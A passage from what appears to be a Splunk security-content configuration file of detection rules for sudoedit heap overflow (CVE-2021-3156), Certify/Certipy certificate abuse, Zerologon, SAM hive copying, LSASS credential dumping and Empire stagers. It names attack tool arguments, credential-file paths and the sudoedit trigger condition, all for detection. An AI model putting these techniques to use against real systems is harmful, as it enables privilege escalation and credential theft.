sudoedit is throwing segfaults for other reasons this will pick those up too. action.escu.creation_date = 2021-01-29 action.escu.modification_date = 2021-01-29 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Baron Samedit CVE-2021-3156 Segfault - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Baron Samedit CVE-2021-3156"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Detect Baron Samedit CVE-2021-3156 Segfault - Rule action.correlationsearch.annotations = {"analytic_story": ["Baron Samedit CVE-2021-3156"], "cis20": ["CIS 10"], "confidence": 50, "cve": ["CVE-2021-3156"], "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1068"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects the occurrence of a heap-based buffer overflow in sudoedit.The detection is made by using a Splunk query to identify Linux hosts where the terms "sudoedit" and "segfault" appear in the logs. The detection is important because the heap-based buffer overflow vulnerability in sudoedit can be exploited by attackers to gain elevated root privileges on a vulnerable system, which might lead to the compromise of sensitive data, unauthorized access, and other malicious activities. False positives might occur. Therefore, you must review the logs and investigate further before taking any action. action.notable.param.rule_title = Detect Baron Samedit CVE-2021-3156 Segfault action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `linux_hosts` TERM(sudoedit) TERM(segfault) | stats count min(_time) as firstTime max(_time) as lastTime by host | where count > 5 | `detect_baron_samedit_cve_2021_3156_segfault_filter` [ESCU - Detect Baron Samedit CVE-2021-3156 via OSQuery - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic detects the heap-based buffer overflow for the sudoedit command and identifies instances where the command "sudoedit -s *" is run using the osquery_process data source. This indicates that the sudoedit command is used with the "-s" flag, which is associated with the heap-based buffer overflow vulnerability. The detection is important because it indicates a potential security vulnerability, specifically Baron Samedit CVE-2021-3156, which helps to identify and respond to potential heap-based buffer overflow attacks to enhance the security posture of the organization. This vulnerability allows an attacker to escalate privileges and potentially gain unauthorized access to the system. If the attack is successful, the attacker can gain full control of the system, run arbitrary code, or access sensitive data. Such attacks can lead to data breaches, unauthorized access, and potential disruption of critical systems. False positives might occur since the legitimate use of the sudoedit command with the "-s" flag can also trigger this detection. You must carefully review and validate the findings before taking any action. Next steps include investigating all true positive detections promptly, reviewing the associated processes, gather relevant artifacts, identifying the source of the attack to contain the threat, mitigate the risks, and prevent further damage to the environment. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1068"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects the heap-based buffer overflow for the sudoedit command and identifies instances where the command "sudoedit -s *" is run using the osquery_process data source. This indicates that the sudoedit command is used with the "-s" flag, which is associated with the heap-based buffer overflow vulnerability. The detection is important because it indicates a potential security vulnerability, specifically Baron Samedit CVE-2021-3156, which helps to identify and respond to potential heap-based buffer overflow attacks to enhance the security posture of the organization. This vulnerability allows an attacker to escalate privileges and potentially gain unauthorized access to the system. If the attack is successful, the attacker can gain full control of the system, run arbitrary code, or access sensitive data. Such attacks can lead to data breaches, unauthorized access, and potential disruption of critical systems. False positives might occur since the legitimate use of the sudoedit command with the "-s" flag can also trigger this detection. You must carefully review and validate the findings before taking any action. Next steps include investigating all true positive detections promptly, reviewing the associated processes, gather relevant artifacts, identifying the source of the attack to contain the threat, mitigate the risks, and prevent further damage to the environment. action.escu.how_to_implement = OSQuery installed and configured to pick up process events (info at https://osquery.io) as well as using the Splunk OSQuery Add-on https://splunkbase.splunk.com/app/4402. The vulnerability is exposed when a non privledged user tries passing in a single \ character at the end of the command while using the shell and edit flags. action.escu.known_false_positives = unknown action.escu.creation_date = 2021-01-28 action.escu.modification_date = 2021-01-28 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Baron Samedit CVE-2021-3156 via OSQuery - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Baron Samedit CVE-2021-3156"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Detect Baron Samedit CVE-2021-3156 via OSQuery - Rule action.correlationsearch.annotations = {"analytic_story": ["Baron Samedit CVE-2021-3156"], "cis20": ["CIS 10"], "confidence": 50, "cve": ["CVE-2021-3156"], "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1068"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects the heap-based buffer overflow for the sudoedit command and identifies instances where the command "sudoedit -s *" is run using the osquery_process data source. This indicates that the sudoedit command is used with the "-s" flag, which is associated with the heap-based buffer overflow vulnerability. The detection is important because it indicates a potential security vulnerability, specifically Baron Samedit CVE-2021-3156, which helps to identify and respond to potential heap-based buffer overflow attacks to enhance the security posture of the organization. This vulnerability allows an attacker to escalate privileges and potentially gain unauthorized access to the system. If the attack is successful, the attacker can gain full control of the system, run arbitrary code, or access sensitive data. Such attacks can lead to data breaches, unauthorized access, and potential disruption of critical systems. False positives might occur since the legitimate use of the sudoedit command with the "-s" flag can also trigger this detection. You must carefully review and validate the findings before taking any action. Next steps include investigating all true positive detections promptly, reviewing the associated processes, gather relevant artifacts, identifying the source of the attack to contain the threat, mitigate the risks, and prevent further damage to the environment. action.notable.param.rule_title = Detect Baron Samedit CVE-2021-3156 via OSQuery action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `osquery_process` | search "columns.cmdline"="sudoedit -s \\*" | `detect_baron_samedit_cve_2021_3156_via_osquery_filter` [ESCU - Detect Certify Command Line Arguments - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies when the attacker tool Certify or Certipy are used to enumerate Active Directory Certificate Services (AD CS) environments. The default command line arguments of these tools are similar and perform near identical enumeration or exploitation functions. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Command and Control"], "mitre_attack": ["T1649", "T1105"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies when the attacker tool Certify or Certipy are used to enumerate Active Directory Certificate Services (AD CS) environments. The default command line arguments of these tools are similar and perform near identical enumeration or exploitation functions. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Unknown action.escu.creation_date = 2023-06-25 action.escu.modification_date = 2023-06-25 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Certify Command Line Arguments - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Certificate Services", "Ingress Tool Transfer"] action.risk = 1 action.risk.param._risk_message = Certify/Certipy arguments detected on $dest$. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 90}, {"threat_object_field": "process_name", "threat_object_type": "process"}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect Certify Command Line Arguments - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Certificate Services", "Ingress Tool Transfer"], "cis20": ["CIS 10"], "confidence": 90, "impact": 100, "kill_chain_phases": ["Exploitation", "Command and Control"], "mitre_attack": ["T1649", "T1105"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies when the attacker tool Certify or Certipy are used to enumerate Active Directory Certificate Services (AD CS) environments. The default command line arguments of these tools are similar and perform near identical enumeration or exploitation functions. action.notable.param.rule_title = Detect Certify Command Line Arguments action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process IN ("* find *","* auth *","* request *","* req *","* download *",) AND Processes.process IN ("* /vulnerable*","* /enrolleeSuppliesSubject *","* /json /outfile*","* /ca*", "* -username *","* -u *") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `detect_certify_command_line_arguments_filter` [ESCU - Detect Certify With PowerShell Script Block Logging - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies when the attacker tool Certify is used through an in-memory PowerShell function to enumerate Active Directory Certificate Services (AD CS) environments. The default command line arguments for the binary version of this tools are similar to PowerShell calls and perform near identical enumeration or exploitation functions. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1649", "T1059", "T1059.001"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies when the attacker tool Certify is used through an in-memory PowerShell function to enumerate Active Directory Certificate Services (AD CS) environments. The default command line arguments for the binary version of this tools are similar to PowerShell calls and perform near identical enumeration or exploitation functions. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell.. action.escu.known_false_positives = Unknown, partial script block matches. action.escu.creation_date = 2023-06-25 action.escu.modification_date = 2023-06-25 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Certify With PowerShell Script Block Logging - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Windows Certificate Services", "Malicious PowerShell"] action.risk = 1 action.risk.param._risk_message = Certify arguments through PowerShell detected on $dest$. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 90}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 90}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect Certify With PowerShell Script Block Logging - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Certificate Services", "Malicious PowerShell"], "cis20": ["CIS 10"], "confidence": 90, "impact": 100, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1649", "T1059", "T1059.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies when the attacker tool Certify is used through an in-memory PowerShell function to enumerate Active Directory Certificate Services (AD CS) environments. The default command line arguments for the binary version of this tools are similar to PowerShell calls and perform near identical enumeration or exploitation functions. action.notable.param.rule_title = Detect Certify With PowerShell Script Block Logging action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 (ScriptBlockText IN ("*find *") AND ScriptBlockText IN ("* /vulnerable*","* -vulnerable*","* /enrolleeSuppliesSubject *","* /json /outfile*")) OR (ScriptBlockText IN (,"*auth *","*req *",) AND ScriptBlockText IN ("* -ca *","* -username *","* -u *")) OR (ScriptBlockText IN ("*request *","*download *") AND ScriptBlockText IN ("* /ca:*")) | stats count min(_time) as firstTime max(_time) as lastTime list(ScriptBlockText) as command Values(OpCode) as reason values(Path) as file_name values(UserID) as user by _time Computer EventCode | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | eval file_name = case(isnotnull(file_name),file_name,true(),"unknown") | eval signature = substr(command,0,256) | rename Computer as dest,EventCode as signature_id | `detect_certify_with_powershell_script_block_logging_filter` [ESCU - Detect Certipy File Modifications - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies when the attacker tool Certipy is used to enumerate Active Directory Certificate Services (AD CS) environments. The default behavior of this toolkit drops a number of file uniquely named files or file extensions related to it's information gathering and exfiltration process. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1649", "T1560"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies when the attacker tool Certipy is used to enumerate Active Directory Certificate Services (AD CS) environments. The default behavior of this toolkit drops a number of file uniquely named files or file extensions related to it's information gathering and exfiltration process. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints as well as file creation or deletion events. action.escu.known_false_positives = Unknown action.escu.creation_date = 2023-06-25 action.escu.modification_date = 2023-06-25 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Certipy File Modifications - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Certificate Services", "Data Exfiltration", "Ingress Tool Transfer"] action.risk = 1 action.risk.param._risk_message = Suspicious files $file_name$ related to Certipy detected on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 45}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 45}, {"threat_object_field": "file_name", "threat_object_type": "file_name"}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect Certipy File Modifications - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Certificate Services", "Data Exfiltration", "Ingress Tool Transfer"], "cis20": ["CIS 10"], "confidence": 90, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1649", "T1560"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies when the attacker tool Certipy is used to enumerate Active Directory Certificate Services (AD CS) environments. The default behavior of this toolkit drops a number of file uniquely named files or file extensions related to it's information gathering and exfiltration process. action.notable.param.rule_title = Detect Certipy File Modifications action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) AS firstTime max(_time) AS lastTime values(Processes.process_current_directory) as process_current_directory FROM datamodel=Endpoint.Processes where Processes.action="allowed" BY _time span=1h Processes.user Processes.dest Processes.process_id Processes.process_name Processes.process Processes.process_path Processes.parent_process_name Processes.parent_process Processes.process_guid Processes.action |`drop_dm_object_name(Processes)` | join max=0 dest process_guid [| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where Filesystem.file_name IN ("*_certipy.zip", "*_certipy.txt", "*_certipy.json", "*.ccache") by Filesystem.file_create_time Filesystem.process_id Filesystem.process_guid Filesystem.file_name Filesystem.file_path Filesystem.dest | `drop_dm_object_name(Filesystem)` ] | fields firstTime lastTime user dest file_create_time file_name file_path parent_process_name parent_process process_name process_path process_current_directory process process_guid process_id | where isnotnull(file_name) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_certipy_file_modifications_filter` [ESCU - Detect Computer Changed with Anonymous Account - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search looks for Event Code 4742 (Computer Change) or EventCode 4624 (An account was successfully logged on) with an anonymous account. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1210"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search looks for Event Code 4742 (Computer Change) or EventCode 4624 (An account was successfully logged on) with an anonymous account. action.escu.how_to_implement = This search requires audit computer account management to be enabled on the system in order to generate Event ID 4742. We strongly recommend that you specify your environment-specific configurations (index, source, sourcetype, etc.) for Windows Event Logs. Replace the macro definition with configurations for your Splunk environment. The search also uses a post-filter macro designed to filter out known false positives. action.escu.known_false_positives = None thus far found action.escu.creation_date = 2020-09-18 action.escu.modification_date = 2020-09-18 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Computer Changed with Anonymous Account - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Detect Zerologon Attack"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Detect Computer Changed with Anonymous Account - Rule action.correlationsearch.annotations = {"analytic_story": ["Detect Zerologon Attack"], "cis20": ["CIS 10"], "confidence": 70, "cve": ["CVE-2020-1472"], "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1210"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4624 OR EventCode=4742 TargetUserName="ANONYMOUS LOGON" LogonType=3 | stats count values(host) as host, values(TargetDomainName) as Domain, values(user) as user | `detect_computer_changed_with_anonymous_account_filter` [ESCU - Detect Copy of ShadowCopy with Script Block Logging - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \ This analytic identifies `copy` or `[System.IO.File]::Copy` being used to capture the SAM, SYSTEM or SECURITY hives identified in script block. This will catch the most basic use cases for credentials being taken for offline cracking. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.002", "T1003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \ This analytic identifies `copy` or `[System.IO.File]::Copy` being used to capture the SAM, SYSTEM or SECURITY hives identified in script block. This will catch the most basic use cases for credentials being taken for offline cracking. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = Limited false positives as the scope is limited to SAM, SYSTEM and SECURITY hives. action.escu.creation_date = 2021-07-21 action.escu.modification_date = 2021-07-21 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Copy of ShadowCopy with Script Block Logging - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Credential Dumping"] action.risk = 1 action.risk.param._risk_message = PowerShell was identified running a script to capture the SAM hive on endpoint $ComputerName$ by user $User$. action.risk.param._risk = [{"risk_object_field": "User", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "ComputerName", "risk_object_type": "system", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect Copy of ShadowCopy with Script Block Logging - Rule action.correlationsearch.annotations = {"analytic_story": ["Credential Dumping"], "cis20": ["CIS 10"], "confidence": 100, "cve": ["CVE-2021-36934"], "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.002", "T1003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \ This analytic identifies `copy` or `[System.IO.File]::Copy` being used to capture the SAM, SYSTEM or SECURITY hives identified in script block. This will catch the most basic use cases for credentials being taken for offline cracking. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.notable.param.rule_title = Detect Copy of ShadowCopy with Script Block Logging action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 Message IN ("*copy*","*[System.IO.File]::Copy*") AND Message IN ("*System32\\config\\SAM*", "*System32\\config\\SYSTEM*","*System32\\config\\SECURITY*") | stats count min(_time) as firstTime max(_time) as lastTime by OpCode ComputerName User EventCode Message | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_copy_of_shadowcopy_with_script_block_logging_filter` [ESCU - Detect Credential Dumping through LSASS access - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects the reading of lsass memory, which is consistent with credential dumping. Reading lsass memory is a common technique used by attackers to steal credentials from the Windows operating system. The detection is made by monitoring the sysmon events and filtering for specific access permissions (0x1010 and 0x1410) on the lsass.exe process helps identify potential instances of credential dumping.The detection is important because it suggests that an attacker is attempting to extract credentials from the lsass memory, which can lead to unauthorized access, data breaches, and compromise of sensitive information. Credential dumping is often a precursor to further attacks, such as lateral movement, privilege escalation, or data exfiltration. False positives can occur due to legitimate actions that involve accessing lsass memory. Therefore, extensive triage and investigation are necessary to differentiate between malicious and benign activities. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.001", "T1003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects the reading of lsass memory, which is consistent with credential dumping. Reading lsass memory is a common technique used by attackers to steal credentials from the Windows operating system. The detection is made by monitoring the sysmon events and filtering for specific access permissions (0x1010 and 0x1410) on the lsass.exe process helps identify potential instances of credential dumping.The detection is important because it suggests that an attacker is attempting to extract credentials from the lsass memory, which can lead to unauthorized access, data breaches, and compromise of sensitive information. Credential dumping is often a precursor to further attacks, such as lateral movement, privilege escalation, or data exfiltration. False positives can occur due to legitimate actions that involve accessing lsass memory. Therefore, extensive triage and investigation are necessary to differentiate between malicious and benign activities. action.escu.how_to_implement = This search needs Sysmon Logs and a sysmon configuration, which includes EventCode 10 with lsass.exe. This search uses an input macro named `sysmon`. We strongly recommend that you specify your environment-specific configurations (index, source, sourcetype, etc.) for Windows Sysmon logs. Replace the macro definition with configurations for your Splunk environment. The search also uses a post-filter macro designed to filter out known false positives. action.escu.known_false_positives = The activity may be legitimate. Other tools can access lsass for legitimate reasons, and it's possible this event could be generated in those cases. In these cases, false positives should be fairly obvious and you may need to tweak the search to eliminate noise. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Credential Dumping through LSASS access - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Detect Zerologon Attack", "CISA AA23-347A", "Credential Dumping"] action.risk = 1 action.risk.param._risk_message = The $SourceImage$ has attempted access to read $TargetImage$ was identified on endpoint $dest$, this is indicative of credential dumping and should be investigated. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "TargetImage", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect Credential Dumping through LSASS access - Rule action.correlationsearch.annotations = {"analytic_story": ["Detect Zerologon Attack", "CISA AA23-347A", "Credential Dumping"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.001", "T1003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects the reading of lsass memory, which is consistent with credential dumping. Reading lsass memory is a common technique used by attackers to steal credentials from the Windows operating system. The detection is made by monitoring the sysmon events and filtering for specific access permissions (0x1010 and 0x1410) on the lsass.exe process helps identify potential instances of credential dumping.The detection is important because it suggests that an attacker is attempting to extract credentials from the lsass memory, which can lead to unauthorized access, data breaches, and compromise of sensitive information. Credential dumping is often a precursor to further attacks, such as lateral movement, privilege escalation, or data exfiltration. False positives can occur due to legitimate actions that involve accessing lsass memory. Therefore, extensive triage and investigation are necessary to differentiate between malicious and benign activities. action.notable.param.rule_title = Detect Credential Dumping through LSASS access action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=10 TargetImage=*lsass.exe (GrantedAccess=0x1010 OR GrantedAccess=0x1410) | stats count min(_time) as firstTime max(_time) as lastTime by dest, SourceImage, SourceProcessId, TargetImage, TargetProcessId, EventCode, GrantedAccess | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `detect_credential_dumping_through_lsass_access_filter` [ESCU - Detect Empire with PowerShell Script Block Logging - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \ This analytic identifies the common PowerShell stager used by PowerShell-Empire. Each stager that may use PowerShell all uses the same pattern. The initial HTTP will be base64 encoded and use `system.net.webclient`. Note that some obfuscation may evade the analytic. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.001"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \ This analytic identifies the common PowerShell stager used by PowerShell-Empire. Each stager that may use PowerShell all uses the same pattern. The initial HTTP will be base64 encoded and use `system.net.webclient`. Note that some obfuscation may evade the analytic. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = False positives may only pertain to it not being related to Empire, but another framework. Filter as needed if any applications use the same pattern. 